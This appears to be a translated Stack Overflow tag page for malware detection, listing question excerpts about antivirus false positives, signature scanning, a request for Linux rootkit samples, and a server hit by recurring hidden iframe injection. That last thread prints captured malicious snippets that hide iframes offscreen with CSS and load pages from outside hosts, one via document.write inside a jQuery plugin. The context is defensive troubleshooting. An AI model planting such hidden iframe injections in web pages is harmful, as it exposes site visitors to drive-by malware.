问题标签 [malware-detection]

For questions regarding programming in ECMAScript (JavaScript/JS) and its various dialects/implementations (excluding ActionScript). Note JavaScript is NOT the same as Java! Please include all relevant tags on your question; e.g., [node.js], [jquery], [json], [reactjs], [angular], [ember.js], [vue.js], [typescript], [svelte], etc.

0 投票
2 回答
380 浏览

assembly - Shellcode 搜索字节字符串:0C330408Bh

我正在学习恶意软件(Blackhole Exploit)的工作原理,我从恶意代码中提取了 shellcode。除了搜索字节字符串之外,我想通了一切。谁可以帮我这个事?为什么这个 shellcode(大多数恶意 shellcode)会搜索这个特定的字符串?搜索代码如下:

0 投票
1 回答
165 浏览

internet-explorer - Internet Explorer 和 Chrome 将我的软件识别为病毒

我开发了一个不错的软件,我想在线发布它,我制作了一个不错的网站供下载,但似乎 Internet Explorer 和 Chrome 将我的软件识别为病毒并向用户发布下载警告如何安装它,我认为它正在为微软资源管理器使用 SmartScreen 并且 chrome 浏览器信息说这个信息

谁能建议我该怎么做?如何让我的软件下载获得批准?

我是开发新手,所以如果这是一个愚蠢的问题,我很抱歉......

谢谢你们

0 投票
3 回答
5659 浏览

security - iFrame 注入攻击跟随我们到新服务器

几个月前,隐藏的 iFrame 开始出现在我们专用服务器上每个站点的每个页面上。当我们使用 503 将站点停机进行维护时,iFrame 仍然在停机维护页面上。最终,宿主封锁了 iFrame 的来源,但我们始终没有找到后门。注入的 iFrame 看起来像这样,但包裹在一个样式标签中以进行混淆,并带有各种 URL:

iframe src="http://heusnsy.nl/32283947.html..

我们将较小的站点移到了不同​​的主机上,它们都很好。

我们将主站点移动到同一主机上的新专用服务器上,尽管我们努力锁定服务器 - 防火墙、限制访问、软件更新、检查每个文件 - iFrame 还是返回了。

我们到处寻找它是如何进入的 - 配置文件,htaccess - 但找不到它。

知道隐藏的 iFrame 注入漏洞可能在哪里吗?

编辑:这里有更多细节:运行 Apache 和 PHP 的 Linux 机器。一切的最新版本。注入的代码如下所示:

<style>.ivx4di91j1 { position:absolute; left:-1418px; top:-1348px} </style> <div class="ivx4di91j1"><iframe src="heusnsy.nl/32283947.html..

更新:这里有更多信息和我们学到的东西:

主机:Station CentOS Linux 6.3 - x86_64 上的 Linux 2.6.32-279.5.1.el6.x86_64 / Apache 版本 2.2.15 - PHP 5.3.3 (cli)(构建时间:2012 年 7 月 3 日 16:53:21)

  1. 服务器本身没有受到损害。

  2. 包括 (apache/php) 在内的所有服务都升级到我们系统可用的最新版本。

  3. 没有帐户(ftp 或其他)受到损害。

  4. 恶意软件在多个受感染站点上同时更改其目标 URL (iframe src=)。(由 unmaskparasites.com 提供)

  5. 在更改 src 目标期间,没有执行/运行任何流氓或隐藏进程。

  6. TCPDUMP 在离开端口 80 tcp 时获取了恶意软件的代码,但在接收恶意软件的用户的 GET 请求中没有发现任何奇怪的东西——在相应的 apache 访问日志中也没有发现任何奇怪的东西。

  7. 在 iFrame 的 src url 地址切换期间,网站文件或 httpd/php 二进制文件没有以任何方式更改 - 由 md5sum 检查提供。

  8. 在更改期间,未在已知端口上为已知服务建立恶意连接。防火墙负责其余的工作。

  9. rkhunter 和 maldet 没有结果。

  10. "</script>"恶意软件 iFrame在任何具有此标签的页面上的第一个标签之后被触发并注入,在此服务器上的所有帐户和网站上。

  11. 恶意软件被注入到静态页面和没有数据库连接的站点上。<head> </script></head>(页面有标签就足够了)

  12. 没有安装流氓 apache 模块或 php 模块(不包括 mycript.so)。大多数默认的 apache 模块都被挂起并被注释掉。

  13. 恶意软件并非一直存在。它来来去去,有时会关闭几个小时,然后出现几个用户并再次熄灭。使其非常难以追踪。

  14. 我们网站上运行的 100% 的 php 代码和大多数 javascript 代码(除了 phpmyadmin 之外)是自定义编码的。唯一不是 Jquery 库。

服务器是高流量机器,在日志中搜索/匹配非常慢。每周访问日志可能会超过 15GB。

情况就是这样……这不再是被盗帐户、被黑文件、流氓脚本的问题。这是迄今为止我们所见过的任何事情,原因隐藏在 apache/php 本身的某个地方。(至少这是我们的想法)。非常感谢任何帮助或想法。

以下是 iFrame 注入的示例:

<script src="/templates/js/jquery-1.4.2.min.js" type="text/javascript"></script><style>.pw0xxs { position:absolute; left:-1795px; top:-1357px} </   style> <div class="pw0xxs"><iframe src="http://infectedsite.com/84064443.html" width="167" height="332"></iframe></div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js" type="text/javascript"></script><style>.h3fuonj6 { position:absolute; left :-1012px; top:-1348px} </style> <div class="h3fuonj6"><iframe src="http://infectedsite.com/13334443.html" width="236" height="564"></iframe></div >

</script><style>.exm31sfk8l { position:absolute; left:-1349px; top:-1836px} </style> <div class="exm31sfk8l"><iframe src="http://infectedsite.com/79144443.html" wid th="559" height="135"></iframe></div> document.write('<style>.exm31sfk8l { position:absolute; left:-1349px; top:-1836px} </style> <div class="exm31sfk8l"><iframe src="http://ksner.pl/79144443.ht ml" width="559" height="135"></iframe></div>');// ColorBox v1.3.19.3 - jQuery lightbox plugin

</script><style>.rv9mlj { position:absolute; left:-1698px; top:-1799px} </style> <div class="rv9mlj"><iframe src="http://infectedsite.com/42054443. html" width="163" height="409"></iframe></div>

<script src="./js/cross_framing_protection.js?ts=1344391602" type="text/javascript"></script><style>.rv9mlj { position:absolute; left:-1698px; top:-1799px}  </style> <div class="rv9mlj"><iframe src="http://infectedsite.com/42054443.html" width="163" height="409"></iframe></div>

0 投票
2 回答
1258 浏览

c# - 证明我们的程序无病毒的证书?

我们正在制作一个软件 (C# / .NET 2.0),该软件可在网站上下载。

现在这是一个只为少数客户提供的特殊程序。结果,许多防病毒程序(Norton、Mc Afee、Avira ......)不了解我们的程序并发出错误警报(“可疑......” - “社区不知道......”等。 )。

许多客户感到不安全,或者不知道如何处理。

那么,一般情况下如何处理呢?我们可以添加某种“证明”来保证我们的程序没有病毒吗?

0 投票
2 回答
1650 浏览

security - 签名扫描

许多防病毒程序使用基于签名的恶意软件检测。这是为 ClamAV 创建签名。考虑到整个文件是恶意软件,我可以理解他们如何创建签名,但我不明白如何在文件正文中找到恶意软件 - 哈希将是另一个。有人知道吗?

0 投票
2 回答
2399 浏览

linux - Linux 内核 Rootkit 示例

作为我的论文,我正在研究一些用于 Linux 内核 Rootkit 检测的新技术。我需要一些 rootkit 样本来测试我的方法并进行一些机器学习测试。但不是在计算机历史书籍中也可以找到的 packetstorm 中尘土飞扬的旧版本。我已经阅读了很多关于它的内容,并且在 phrack 和其他一些资源中看到了一些 rootkit 实现的新方法。为我实现 PoC rootkit 将花费大量时间,届时我将开始我的项目。

如果有人可以帮助我,将不胜感激。任何站点、ftp、受感染的系统、未知的 rootkit 库,任何可能作为我工作样本的东西都将受到赞赏。但考虑到这一点,我需要的是Linux 内核 Rootkits。任何类型,LKM,系统调用挂钩,对象挂钩,system.map /dev/mem 工作的东西

谢谢

ps 新的 rootkit 我并不是说像未报道或全新闻的 rootkit,适用于 ubuntu 10.04 或更高版本的东西会很棒(内核版本 2.6.32+)

0 投票
3 回答
27992 浏览

google-chrome - Chrome 说我的网站包含恶意软件?

Chrome 说,当我访问我的网站时,搜索后我从网站上清理了我的代码,但 chrome 仍然显示然后我从我的网站上删除了所有文件,只是上传了 index.html(空白文件),但仍然显示警告。

0 投票
2 回答
216 浏览

malware - 当谷歌将文件标记为恶意软件时?

我的网站中有几个 Js 文件,包括 jQuery。

谷歌说:

Google 上一次在该网络上测试网站是在 2013 年 2 月 14 日,最后一次发现可疑内容是在 2013 年 2 月 14 日。

您知道 Google 在什么情况下会检测到 Js 文件中的恶意软件吗?文件中的代码或恶意软件有问题?

0 投票
1 回答
498 浏览

asp.net - 我可以在将图像文件上传到 ASP.NET 之前测试其有效性吗?

我有一个 ASP.NET Web 应用程序,它允许用户将文件从他的 PC 上传到 SQL Server 数据库(稍后用于为标签生成图像)。是否有一种“简单”的方法可以在 .NET 中测试图像,以在保存之前验证它不包含任何恶意内容?

现在,我使用这个:

如果 TestBitmap 不是图像(例如,如果 Filename 是文本文件的名称),则创建 TestBitmap 会失败,但显然这不会阻止带有恶意代码的图像文件作为图像加载,因此保存它作为 MemoryStream 然后将流写入字节数组(稍后保存在数据库中)据说可以解决这个问题。

0 投票
1 回答
240 浏览

malware-detection - 我的应用程序被检测为恶意软件

情况

有一个桌面应用程序的安装程序。当它运行时,它会解压缩一些可执行文件,执行它们,写入注册表等。每个可执行文件和安装程序本身都是由 out 团队编写的,不旨在对用户造成任何伤害,并使用有效的安全证书进行签名。无论如何,Malwarebytes AntiMalware 工具将其中一个可执行文件识别为 MSIL.downloader。

问题

我们怎样才能摆脱这种行为?

细节

  • 我们的几个客户报告了这个问题。但是,当我在我的机器上使用相同的工具扫描文件时,它没有检测到其中的任何间谍软件。
  • 我们有问题可执行文件的源代码,如果有帮助可以稍微重写它们